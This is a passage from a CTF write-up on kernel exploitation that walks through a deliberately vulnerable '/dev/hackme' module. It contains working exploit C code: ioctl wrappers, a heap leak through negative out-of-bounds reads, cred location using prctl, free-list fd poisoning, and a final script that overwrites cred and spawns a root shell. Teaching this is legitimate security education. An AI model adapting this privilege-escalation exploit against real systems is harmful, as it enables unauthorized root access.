void kwrite(unsigned int idx, size_t size, size_t offset) {
  arg.idx = idx;
  arg.size = size;
  arg.offset = offset;
  int res = ioctl(fd, 0x30002, &arg);
  assert(res >= 0);
}

void kread(unsigned int idx, size_t size, size_t offset) {
  arg.idx = idx;
  arg.size = size;
  arg.offset = offset;
  int res = ioctl(fd, 0x30003, &arg);
  assert(res >= 0);
}

void printhex(char* pbuf, size_t size)
{
	unsigned char* buf = (unsigned char*)pbuf;
	for (size_t i = 0; i < size; ++i)
	{
		printf("%.2x", buf[i]);
	}
	printf("\n");
}

Then append a main function at the bottom of the file:

int main() {
  printf("Running Exploitation...\n");
  init();

  for(int i = 0; i < 10; i++)
    kmalloc(i, i + 'A', 0x100);

}

We keep the /dev/hackme file descriptor in fd and add several wrapper functions around the module’s ioctl commands. The program has to be statically compiled, and the ELF packed into the cpio archive:

gcc exp.c -static -o exp
# where you unpacked the original cpio
cd fs
cp ../exp .
# You also need to point startvm.sh at the new cpio file
find . -print0 | cpio --null -ov --format=newc > ../new.cpio

Attach your debugger to the kernel, and let’s find where we need to break:

/home/pwn # cat /proc/kallsyms | grep hack
ffffffff97e5d000 D __vvar_beginning_hack
ffffffffc010f000 t hackme_ioctl	[hackme]
ffffffffc0111000 d misc	[hackme]
ffffffffc0111060 d fops	[hackme]
ffffffffc0110068 r _note_6	[hackme]
ffffffffc0111400 b pool	[hackme]
ffffffffc0111180 d __this_module	[hackme]
ffffffffc010f190 t cleanup_module	[hackme]
ffffffffc010f170 t init_module	[hackme]
ffffffffc010f190 t hackme_exit	[hackme]
ffffffffc010f170 t hackme_init	[hackme]

hackme_ioctl is at 0xffffffffc010f000, so we set b *0xffffffffc010f000. When we execute our exp file, the breakpoint is triggered:

Thread 1 hit Breakpoint 2, 0xffffffffc010f000 in ?? ()

Starting from this address, we can set breakpoints on the kmalloc and kfree calls by adding their offsets, and then inspect the kernel heap:

gef➤  b *0xffffffffc010f000+0x0143
Breakpoint 3 at 0xffffffffc010f143
gef➤  b *0xffffffffc010f000+0x0122
Breakpoint 4 at 0xffffffffc010f122

...

Thread 1 hit Breakpoint 3, 0xffffffffc010f143 in ?? ()

Step a few times and record the pointer returned by kmalloc. After copy_from_user has executed, we can see:

gef➤  x/10gx  0xffff967a0013d6c0
0xffff967a0013d6c0:	0x4242424242424242	0x4242424242424242

Okay, our function works correctly.

Leak Primitive

We already have a leak primitive. To edit cred, we first need to leak its address. Since the chunks in front of ours are used by the kernel, let’s look for kernel pointers by reading the memory just before our first chunk:

gef➤  x/20gx 0xffffa4464017b400-0x200
0xffffa4464017b200:	0xffffffffb60472c0	0x0000000100000000
0xffffa4464017b210:	0x0000000000000001	0x0000000000000000
0xffffa4464017b220:	0xffffffffb6047240	0xffffffffb6049ae0
0xffffa4464017b230:	0xffffffffb6049ae0	0xffffa44640015100
0xffffa4464017b240:	0xffffa4464017b250	0x0000000000000000
0xffffa4464017b250:	0xffffa446400213d1	0x0000000000000000
0xffffa4464017b260:	0xffffa4464017b270	0xffffa4464017b200
0xffffa4464017b270:	0xffffa4464017b250	0x0000000000000000
0xffffa4464017b280:	0x0000000000000000	0xffffa4464017b200
0xffffa4464017b290:	0xffffa4464001c258	0x0000000000000000

/home/pwn # cat /proc/kallsyms  | grep ffffffffb60472c0
ffffffffb60472c0 d uts_kern_table

Interesting. Let’s verify that it is stable (I only edited the main function):

int main() {
  printf("Running Exploitation...\n");
  init();

  for(int i = 0; i < 10; i++)
    kmalloc(i, i + 'A', 0x100);

  kread(0, 0x200, -0x200);
  printhex(buf, 8);
}

Run it (printhex prints the bytes in memory order, so the little-endian pointer appears byte-reversed):

/home/pwn # /exp
Running Exploitation...
c07244a0ffffffff
/home/pwn # cat /proc/kallsyms | grep uts_kern_table
ffffffffa04472c0 d uts_kern_table
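
The hex string printed by printhex is the pointer in little-endian byte order. A small helper makes that explicit and also lets us compare leaks across boots. This is a sketch with hypothetical helper names (load_le64, kaslr_delta); the sample values in the note below are the ones shown in this post.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Reassemble a little-endian 64-bit value from raw bytes, e.g. bytes copied out by kread(). */
uint64_t load_le64(const unsigned char *p)
{
    uint64_t v = 0;

    assert(p != NULL);
    for (size_t i = 0; i < 8; i++)
        v |= (uint64_t)p[i] << (8 * i);
    return v;
}

/* Distance between a leaked address and a reference address of the same symbol. */
uint64_t kaslr_delta(uint64_t leaked, uint64_t reference)
{
    return leaked - reference;
}
```

Feeding the eight bytes c0 72 44 a0 ff ff ff ff to load_le64 gives 0xffffffffa04472c0, the uts_kern_table address reported by kallsyms. Compared with the 0xffffffffb60472c0 seen in the earlier gdb session, the delta is 0x15c00000, which is kASLR moving the kernel between boots.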

Besides using the negative OOB to read earlier chunks, we can also inspect freed chunks and, with some luck, find a leaked heap address.

Locating cred

Now we have to find cred. A neat method is prctl plus heap feng shui. More precisely, prctl(PR_SET_NAME) writes a string of our choice into the comm field of task_struct, which sits right after the real_cred and cred pointers. By scanning for that string with a negative read, we can leak the address of cred:

char scan[] = "TestTestTest";

int main() {
  printf("Running Exploitation...\n");
  
  uintptr_t cred;
  prctl(PR_SET_NAME, scan);

  init();
  for(int i = 0; i < 64; i++) {
    kmalloc(i, 'A' + i, 0x40);
  }
  
  printf("Leaking Base Adress\n");
  kread(63, BUF_SIZE, -BUF_SIZE);
  char* ret = (char*) memmem(buf, sizeof(buf), scan, sizeof(scan) - 1);
  if (ret) {
    cred = *(uintptr_t*)(ret - 8);
    assert(*(uintptr_t*)(ret - 0x10) == cred);
    printf("%p %p\n", (void*)(ret - buf), (void*)cred);
    puts(ret);
  }

  kfree(10);
}

We first read a large region of memory. If we find the scan string, we read the two pointers in front of it and verify that they are identical. Break on kfree in the kernel module to verify our assumption:

/home/pwn # /exp
Running Exploitation...
Leaking Base Adress
0xdefc8 0xffff9c6600025a00

gef➤  x/10gx  0xffff9c6600025a00
0xffff9c6600025a00:	0x0000000000000003	0x0000000000000000
0xffff9c6600025a10:	0x0000000000000000	0x0000000000000000
0xffff9c6600025a20:	0x0000000000000000	0x0000000000000000
0xffff9c6600025a30:	0x0000003fffffffff	0x0000003fffffffff
0xffff9c6600025a40:	0x0000003fffffffff	0x0000000000000000

The system is started as root, so the run of zeros is what we expect for the UID and GID fields of cred.
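
To read the dump field by field, here is a sketch of the start of struct cred as it is commonly laid out on x86_64 kernels of this era when CONFIG_DEBUG_CREDENTIALS is off. That layout is an assumption and should be checked against the target kernel's headers. cred_head and cred_head_is_root are illustrative names:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Assumed layout of the first 0x28 bytes of struct cred (no debug fields).
struct cred_head {
  uint32_t usage;         // reference count (atomic_t)
  uint32_t uid, gid;      // real IDs
  uint32_t suid, sgid;    // saved IDs
  uint32_t euid, egid;    // effective IDs
  uint32_t fsuid, fsgid;  // filesystem IDs
  uint32_t securebits;
};

// Returns 1 when every ID in the dumped bytes is 0 (root), else 0.
int cred_head_is_root(const void *dump) {
  struct cred_head c;
  assert(dump != NULL);
  memcpy(&c, dump, sizeof(c));
  return (c.uid | c.gid | c.suid | c.sgid |
          c.euid | c.egid | c.fsuid | c.fsgid) == 0;
}
```

Under that assumption, the first quadword of the gdb output, 0x0000000000000003, is usage = 3 followed by uid = 0, and the next four quadwords cover the remaining IDs and securebits, all zero.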

Arbitrary Write

The attack is similar to a fastbin attack, but we cannot leave an arbitrary pointer in the free list, because that eventually leads to a kernel panic. We have to allocate into a memory region whose fd is 0. A quick PoC that overwrites the fd of a freed chunk:

int main() {
  printf("Running Exploitation...\n");
  
  uintptr_t cred;
  prctl(PR_SET_NAME, scan);

  init();
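  // kmalloc takes (idx, fill byte, size)
  kmalloc(0, 'A', 0x80);
  kmalloc(1, 'B', 0x80);
  kfree(0);
  // overwrite freed chunk 0, including its fd, through chunk 1
  memset(buf, 'A', 0x80);
  kwrite(1, 0x80, -0x80);
  // the first allocation pops chunk 0, the second follows the bogus fd
  kmalloc(3, 'C', 0x80);
  kmalloc(4, 'D', 0x80);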
}

We get the following result:

Running Exploitation...
[    7.317746] general protection fault: 0000 [#1] NOPTI
[    7.320050] CPU: 0 PID: 27 Comm: TestTestTest Tainted: G           O      4.20.13 #10
[    7.322743] RIP: 0010:__kmalloc+0x68/0x110
...
[    7.336034] RBP: ffffa123c0097dc8 R08: 4141414141414141 R09: 0000000000000000

The kernel panics with a run of A bytes in a register (R08 is 0x4141414141414141), which is our fd payload. You might notice that we chose 0x80 instead of 0x40 here. That is because the free list holds many 0x40 chunks, and they may not be adjacent to each other, so 0x80 chunks are easier to demonstrate with. If we choose 0x40 chunks for the overwrite, we need a heap address to calculate the write offset. Leaking an fd with a negative read, the same trick we used to find cred, gives us that heap address easily.
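
To see why the forged fd must point at memory whose first quadword is 0, here is a userland toy model of a LIFO free list that stores the next pointer in the first 8 bytes of each free chunk. It is only a sketch of the idea, not the real kernel allocator, and all names are made up:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

// Toy free list: head points at the most recently freed chunk, and each free
// chunk keeps the address of the next free chunk in its first bytes.
struct toy_cache { void *head; };

void toy_free(struct toy_cache *c, void *chunk) {
  assert(c != NULL && chunk != NULL);
  memcpy(chunk, &c->head, sizeof(void *));  // chunk->fd = old head
  c->head = chunk;
}

void *toy_alloc(struct toy_cache *c) {
  void *chunk = c->head;
  if (chunk != NULL)
    memcpy(&c->head, chunk, sizeof(void *));  // head = chunk->fd
  return chunk;
}

// Overwrite the fd of a freed chunk, as the negative-offset kwrite does.
void toy_poison(void *freed_chunk, void *target) {
  memcpy(freed_chunk, &target, sizeof(void *));
}
```

After freeing two chunks and poisoning the most recently freed one, the first toy_alloc returns that chunk and the second returns the target. The head then becomes whatever was stored at the target: a non-zero value would be treated as yet another free chunk, while 0 simply ends the list.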

Final Script

Putting it all together, with comments:

#define _GNU_SOURCE  // memmem() is a GNU extension declared in <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <memory.h>
#include <string.h>
#include <assert.h>

// hack_me file descriptor
int fd;

// User Arguments
struct UserArg {
  unsigned int idx;
  char *user_ptr;
  size_t size;
  size_t offset;
} arg;

#define BUF_SIZE 0x100000L

char buf[BUF_SIZE] = {0};

// Initialize the program
void init() {
  fd = open("/dev/hackme", 0);
  if (fd < 0)
    exit(-1);

  arg.user_ptr = buf;
}

void kmalloc(unsigned int idx, char ch, size_t size) {
  memset(buf, ch, sizeof(buf)); 
  arg.idx = idx;
  arg.size = size;
  int res = ioctl(fd, 0x30000, &arg);
  assert(res >= 0);
}

void kfree(unsigned int idx) {
  arg.idx = idx;
  int res = ioctl(fd, 0x30001, &arg);
  assert(res >= 0);
}

void kwrite(unsigned int idx, size_t size, size_t offset) {
  arg.idx = idx;
  arg.size = size;
  arg.offset = offset;
  int res = ioctl(fd, 0x30002, &arg);
  assert(res >= 0);
}

void kread(unsigned int idx, size_t size, size_t offset) {
  arg.idx = idx;
  arg.size = size;
  arg.offset = offset;
  int res = ioctl(fd, 0x30003, &arg);
  assert(res >= 0);
}

void printhex(char* pbuf, size_t size)
{
  unsigned char* buf = (unsigned char*)pbuf;
  for (size_t i = 0; i < size; ++i) {
    printf("%.2x", buf[i]);
  }
	
  printf("\n");
}

char scan[] = "TestTestTest";

int main() {
  printf("Running Exploitation...\n");
  
  uintptr_t cred;
  prctl(PR_SET_NAME, scan);

  init();

  // clean up the 0x40 free list for a more stable fastbin-style attack
  for(int i = 0; i < 64; i++) {
    kmalloc(i, 'A' + i, 0x40);
  }
  
  printf("Leaking Base Adress\n");
  kread(63, BUF_SIZE, -BUF_SIZE);

  // We scan a large segment of heap
  // And use heap fengshui to find cred
  char* ret = (char*) memmem(buf, sizeof(buf), scan, sizeof(scan) - 1);
  if (ret) {
    cred = *(uintptr_t*)(ret - 8);
    assert(*(uintptr_t*)(ret - 0x10) == cred);
    printf("%p %p\n", (void*)(ret - buf), (void*)cred);
    puts(ret);
  } else {
    exit(-1);
  }

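  // Free chunks 61 and 62; chunk 62 is now first in the free list
  kfree(61);
  kfree(62);

  // Overwrite the fd of chunk 62 (assumed to sit 0x40 bytes before
  // chunk 63) so that it points just below cred
  *(uintptr_t*) buf = cred - 0x10;
  kwrite(63, 0x40, -0x40);

  // This allocation takes chunk 62 back; the next one lands on cred - 0x10
  kmalloc(62, 0, 0x40);

  // Change cred to the following layout:
  // two padding qwords, then usage = 3 and every ID set to 0
  uint64_t arr[8] = {
    0x0000000000000000, 0x0000000000000000,
    0x0000000000000003, 0x0000000000000000,
    0x0000000000000000, 0x0000000000000000,
    0x0000000000000000, 0x0000000000000000
  };

  arg.size = 0x40;
  arg.idx = 61;
  arg.user_ptr = (char *) arr;
  ioctl(fd, 0x30000, &arg);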

  // get shell
  char* shargv[] = {"/bin/sh", NULL};
  execve("/bin/sh", shargv, NULL);

  // special thanks
  return 2019;
}

You might notice that we didn’t use the kernel base address. An alternative method is editing the mod tree to get a shell, and that one does require a kernel base address leak.

And the result:

~ $ /exp
Running Exploitation...
Leaking Base Adress
0xd0c88 0xffff99db0d91b100
TestTestTest
/home/pwn # id
uid=0(root) gid=0(root) groups=0(root)

Conclusion

This post covered the basics of kernel pwn in CTFs. I may add real-world cases later.